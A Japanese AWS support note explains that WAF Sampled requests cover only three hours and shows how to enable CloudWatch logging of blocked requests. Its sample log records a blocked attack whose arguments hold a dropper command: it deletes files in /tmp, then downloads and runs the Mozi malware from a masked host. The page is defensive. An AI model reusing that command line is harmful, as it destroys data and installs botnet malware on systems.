AWS WAF にて Web ACLs の overview 画面から Sampled requests を用いてログを確認しています。過去のログはどのような方法で参照できますか?

AWS WAF にて Web ACLs の overview 画面から Sampled requests を用いてログを確認しています。過去のログはどのような方法で参照できますか?

AWS WAF における Web ACLs の overview 画面で表示できる Sampled requests は過去 3 時間分のサンプルとなります。過去のログを参照するためには、明示的にログへの保存を有効にする必要があります。
AWSテクニカルサポートノート

AWSテクニカルサポートノート

#AWS WAF
#AWS
m.hayakawa

m.hayakawa

facebook logohatena logotwitter logo
Clock Icon2022.02.04

この記事は公開されてから1年以上経過しています。情報が古い可能性がありますので、ご注意ください。

困っていた内容

AWS WAF サービスを利用しています。

Web ACLs の overview 画面で、Sampled requests を用いて、ブロックされた IP アドレスを確認しています。

過去のログを確認したいのですが、さかのぼることができません。どのようにすればいいですか?

どう対応すればいいの?

AWS WAF における、Web ACLs の overview 画面で表示できる Sampled requests はあくまでサンプルです。保持期間は最大過去 3 時間までとなります。過去のログを参照するためには、明示的にログへの保存を有効にする必要があります。

ログの有効化

今回は CloudWatch Logs へログを出力する方法を紹介します。

Logging and metrics タブを開き、Logging にて Enabled ボタンを押下します。

Logging destination にて、CloudWatch Logs log group を選択します。選択するロググループは「aws-waf-logs-」で始まるという命名規則があるため、別途作成をしておきます。

Filter logs にて、以下の画像のように設定します。これにより、結果が Block となったログのみ保存されます。

テストとして、AWS-AWSManagedRulesBotControlRuleSet に一致した場合に Block とするように Web ACLs のルールを設定してみました。

CloudWatch Logs に以下のログが生成され、bot からのアクセスが Block されていることを確認できました。(一部加工・マスクしています)

{
    "timestamp": 1643933274579,
    "formatVersion": 1,
    "webaclId": "arn:aws:wafv2:ap-northeast-1:<AccountID>:regional/webacl/test-acl/■",
    "terminatingRuleId": "AWS-AWSManagedRulesBotControlRuleSet",
    "terminatingRuleType": "MANAGED_RULE_GROUP",
    "action": "BLOCK",
    "terminatingRuleMatchDetails": [],
    "httpSourceName": "ALB",
    "httpSourceId": "<AccountID>-app/Test/■",
    "ruleGroupList": [
        {
            "ruleGroupId": "AWS#AWSManagedRulesBotControlRuleSet",
            "terminatingRule": {
                "ruleId": "SignalNonBrowserUserAgent",
                "action": "BLOCK",
                "ruleMatchDetails": null
            },
            "nonTerminatingMatchingRules": [],
            "excludedRules": null
        }
    ],
    "rateBasedRuleList": [],
    "nonTerminatingMatchingRules": [],
    "requestHeadersInserted": null,
    "responseCodeSent": null,
    "httpRequest": {
        "clientIp": "■",
        "country": "■",
        "headers": [
            {
                "name": "■",
                "value": "■"
            },
            {
                "name": "■",
                "value": "■"
            },
            {
                "name": "■",
                "value": "■"
            },
            {
                "name": "■",
                "value": "■"
            }
        ],
        "uri": "/shell",
        "args": "cd+/tmp;rm+-rf+*;wget+http://■:■/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws",
        "httpVersion": "HTTP/1.1",
        "httpMethod": "GET",
        "requestId": "■"
    },
    "labels": [
        {
            "name": "awswaf:managed:aws:bot-control:signal:non_browser_user_agent"
        }
    ]
}

参考資料

ウェブ ACL のテスト - AWS WAF、AWS Firewall Manager、および AWS Shield Advanced

よくある質問 - AWS WAF | AWS

5.リアルタイムメトリクスと Sampled Web Requests はどれほどの期間保存されますか? リアルタイムメトリクスは Amazon CloudWatch に保存されます。Amazon CloudWatch ではイベントを失効させる期間をお客様が設定できます。Sampled Web Requests は最大 3 時間保存されます。

Share this article

facebook logohatena logotwitter logo

関連記事

[アップデート] AWS CDK で CloudFront Distribution の作成後に Web ACL をアタッチ可能になりました

[アップデート] AWS CDK で CloudFront Distribution の作成後に Web ACL をアタッチ可能になりました

User avatar
若槻龍太
2024.11.21
AWS WAF コストの最適化、静的コンテンツの保護とログ記録を除外した利用を試してみた

AWS WAF コストの最適化、静的コンテンツの保護とログ記録を除外した利用を試してみた

User avatar
suzuki.ryo
2024.11.19
AWS WAF のBot Control で検証済みBotをブロックする

AWS WAF のBot Control で検証済みBotをブロックする

User avatar
なおにし
2024.11.13
ALB から Cognito へのアクセス時、WAF によってブロックされてしまうときの対処方法を教えてください。

ALB から Cognito へのアクセス時、WAF によってブロックされてしまうときの対処方法を教えてください。

User avatar
yama
2024.11.08
Classmethod's white logo
Facebook's logo
X's logo
YouTube's logo

© Classmethod, Inc. All rights reserved.